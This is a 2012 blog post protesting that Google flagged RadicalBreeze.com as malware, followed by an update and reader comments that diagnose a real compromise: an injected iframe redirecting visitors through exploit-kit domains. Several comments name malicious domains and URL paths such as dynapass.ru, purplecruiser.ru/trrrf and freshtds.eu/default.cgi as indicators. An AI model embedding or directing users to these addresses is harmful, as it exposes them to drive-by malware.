Google has decided, today, that RadicalBreeze.com contains malware. And will harm your computer.
And they display a gigantic red page stating that you, along with your first born, will be slaughtered in the night -- to any man, woman or child who visits this website with Chrome or via a Google website.
The only thing available from RadicalBreeze.com is Illumination Software Creator.
Which is, most certainly, not malware.
[Unless you modify the word "malware" to mean "something significantly more advanced than a project that Google started but then gave up on because it was too hard".]
You'll notice on that fancy "you will be punched in the face by a goblin" page above that Google provides a link to their "Safe Browsing diagnostic page" for RadicalBreeze.com.
This page lists all of the problems Google found with the website in question.
To the right is a screenshot you can see. Allow me to sum up the problems that Google has with RadicalBreeze.com.
"Site is listed as suspicious - visiting this web site may harm your computer."
Well that's no good! Luckily Google's nifty little tool will tell me what was suspicious so I can fix the problem.
"Of the 21 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and suspicious content was never found on this site within the past 90 days."
Just to sum up:
RadicalBreeze.com is malicious and suspicious. Also, RadicalBreeze.com is not at all malicious nor suspicious... and never has been.
Right.
Now I just need to let Google know about the problem so they can fix their own system (which is either broken... or has been deliberately modified to block RadicalBreeze.com... in which case... Google.com is a malicious website).
They do claim to provide simple steps to request a "malware review". Those steps are as follows:
Request a malware review:
- On the Webmaster Tools Home page, select the site you want.
- Click Health, and then click Malware.
- Click Request a review.
This website is not there. And it won't let me add the website.
There is also no "Health" link (or anything that looks like it) on the "Webmaster Tools Home page" that I can click on.
The only form of contact they provide (including email, phone, IM, mailing address, etc.) is "noreply@google.com".
Which. As you might have guessed, will get you no reply.
So there is a problem. But there is no problem.
And there is a solution. But there is no solution.
Luckily you can contact them. But you cannot contact them.
Awesome.
So I am writing this now. Because the only way it seems that you can get Google to fix anything is to make a big deal about it in public.
UPDATE:
A few hours after I posted this article... my website was actually hacked. Looking through the logs, here's my best guess as to what happened:
- A backdoor was discovered in the Plesk control panel that was in use on that server. A backdoor which I did not know about.
- Google either knew about it or noticed many servers on the same network with the issue that *had* been compromised.
- My server was then deemed as "suspicious" because of that.
- I responded with this post.
- Somebody noticed it, noticed why it was labeled as such... and took advantage of the moment.
- Resulting in a little iframe being embedded in the bottom of the site that was fairly gnarly.
Which... lame. Sometimes the internet can be a very, very lame place.
But, luckily, I had you guys to help me get to the bottom of it! Things are mostly fixed now (radicalbreeze.com is pointing to lunduke.com right now -- or at least it will be once the DNS is updated everywhere -- and I'm working to salvage and fix what I can there).
Filed under: Illumination, Radical Breeze, Tech Stuff |
when I clicked visit any way it then said it had content from dynapass.ru then upon clicking proceed anyway it then took me to the site.
Google, what a farce!
July 26th, 2012 at 2:03 am
I think that malware review only applies to sites under google analytics.
July 26th, 2012 at 2:06 am
I don’t get that on chrome. Has it been fixed?
July 26th, 2012 at 2:17 am
Not sure if it helps, but when I load the page, NOD32 pops up saying:
Address hass been blocked.
URL address:
“freshtds.eu/default.cgi”
IP address:
“94.100.27.20:80″
July 26th, 2012 at 2:18 am
I think it is probably some association they have given to your site for being hosted on AS13768 (PEER1) network. If you look at the diagnostic page for that they list a lot of malware (unsurprisingly, since it is a hosting network).
http://www.google.com/safebrowsing/diagnostic?site=AS:13768&hl=en
Hopefully it is just an error, seems crazy otherwise to punish you for just sharing the same hosting network as genuine malicious websites.
July 26th, 2012 at 2:19 am
That not what am getting am getting this.
What happened when Google visited this site?
Of the 21 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and the last time suspicious content was found on this site was on 2012-07-25.
This site was hosted on 1 network(s) including AS13768 (PEER1).
July 26th, 2012 at 2:30 am
There’s an iframe at the bottom of your HTML that’s http://XXXXX.pl/runforestrun?sid=botnet_api (changed actual host to XXXXX so it’s invalid). That’s the one that redirects to dynapass.ru and then onto another site.
July 26th, 2012 at 2:49 am
http://stopmalvertising.com/malware-reports/runforestrun-pseudo-random-domains-and-random-exploit-kits.html
July 26th, 2012 at 2:52 am
Nick Read: Really? I’m not seeing that here on any browser. Even if I view the source. I mean… if that’s really the case, then that would explain it. But is anyone else seeing that?
July 26th, 2012 at 2:54 am
Nick: Same as Bryan; not seeing it, in Firefox at least, on the main page. What page is that on?
July 26th, 2012 at 2:56 am
The JS adds then removes the iframe, but Chrome seems to keep it around
https://www.dropbox.com/s/8mwvap9va73drba/Selection_001.png
Here’s the network trace too showing the redirects:
https://www.dropbox.com/s/qhfy9kdjjirjcpb/Selection_002.png
July 26th, 2012 at 2:58 am
According to Opera theres an iframe linking to http://purplecruiser.ru/trrrf on the page. That’s probably where the problem lies.
Hmm, apparently the iframe changes everytime I reload the page.
July 26th, 2012 at 3:07 am
FWIW I checked out http://radicalbreeze.com/ two ways. (1) Avast 7.0.1456 with the 120725-2 virus definition set reported the site has an “infection” named “URL:Mal” that is associated with the URL “http://uvrfvmdqaulekssfkfyqusor.sqqkemzg…”, and (2) https://www.virustotal.com/#url which is a multiple-product check checked it out with 28 different products and only had a hit from “Google Safebrowsing” as a “Malware Site” which is bogus as you’ve explained. A quick Google around looks like the URL:Mal warnings could be bogus.
July 26th, 2012 at 3:27 am
Bryan, your server has been hacked and malicious code was injected into your website. Allan would probably confirm that you need to find the security whole, fix it, reinstall everything, change all passwords etc..
Or in short: Google is absolutely right to block your site. And to quote your friends at Techsnap: “Patch your shit!”.
Greetings,
Pierre
July 26th, 2012 at 4:30 am
If you’re still in doubt Bryan, see this urlquery.net report: http://urlquery.net/report.php?id=104059
July 26th, 2012 at 5:25 am
This is why you use DDG or IXQuick/Startpage along with any free software browser like Chromium or Firefox.
It’s possible that some mad person sent a false report.
July 26th, 2012 at 7:20 am
pierre could be right. I’d be easy to confirm if there’s some sort of log of code changes, of course. Or by running diffs against backups.
I wouldn’t say that /is/ the case without seeing any definite proof, though. It’s a bit rough to go from “Something weird has happened” to “Holy haxorz, Batman!” without seeing the code.
July 26th, 2012 at 10:02 am
Pierre is right.
If you view the site, like me, in firefox with no-script enabled nothing happens. But with a disabled no-script i get a placeholder for the aforementioned iframe.
They won’t show up in the source, you can see them however with firebug.
So yeah. your site has been hacked it seems.
July 26th, 2012 at 12:00 pm
When I visit the page, it does show a report of there being at least one instance of software being downloaded without the users consent.
http://imgur.com/fXwLk
July 26th, 2012 at 2:02 pm
Yep you really pissed rms off!
July 26th, 2012 at 2:05 pm
I’m with pierre and James D. Check your site logs.
July 26th, 2012 at 2:19 pm
Bryan why were you not on LAS?
July 26th, 2012 at 2:43 pm
Details about the attack when visiting radicalbreeze.com
http://puu.sh/LUr1
July 26th, 2012 at 5:12 pm
Actually Just yesterday I was looking at the software and I did indeed get infected.. I was kind of shocked as it was the only page I had opened(only lunduke and the software pages were open).. not sure if it was from a rogue ad or what but I did get some malware it was easy to remove from safe mode.. I was using IE at the time, was about 2pm PST time I think.
July 26th, 2012 at 6:00 pm
Also, Firefox says the exact same thing.
July 26th, 2012 at 8:23 pm
Of the 21 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2012-07-25, and the last time suspicious content was found on this site was on 2012-07-25.
Malicious software is hosted on 1 domain(s), including dynapass.ru/.
1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including sqqkemzgshwnkkrk.waw.pl/.
This site was hosted on 1 network(s) including AS13768 (PEER1).
July 26th, 2012 at 9:36 pm
Looks like comment spam, maybe ?
July 26th, 2012 at 9:36 pm
Bryan
Firefox are in on the act also. I got a suspected pishing site page.
July 27th, 2012 at 10:19 am
Happened to me too. They smacked 8 WordPress-installs on 8 domains in a single go. They didn’t use any well-known weakness to get in, but they used a well known weakness in how domains are usually set up at my webhost. Or at least used to be set up. My host now recommends a better way – which I have since switched to – sadly I hadn’t looked at their wiki for 3 years when the bad guys had their smash-and-grab-run.
The involved ip’s in my case were Russian, Polish and Bulgarian. I don’t think they used proxys or zombies, isp’s and law enforcement in those countries can’t be arsed when it happens to small companies and/or individuals abroad. The implanted script randomly picked a domain from a list, requested a url which in somecases redirected the visitor to some shady russian sweepstake-type of site, or tried to download a file. It hid itself pretty darn well and replicated in several places in the database. I ended up reinstalling and blocking broad ranges of ip’s for a couple of months. Haven’t had them visit since. *knocks on wood*
July 27th, 2012 at 7:56 pm
Man that sucks. Why do people have to be assholes and hack sites? Why not do something construtive if you’re gonna be learning about that sort of thing?
August 1st, 2012 at 3:21 am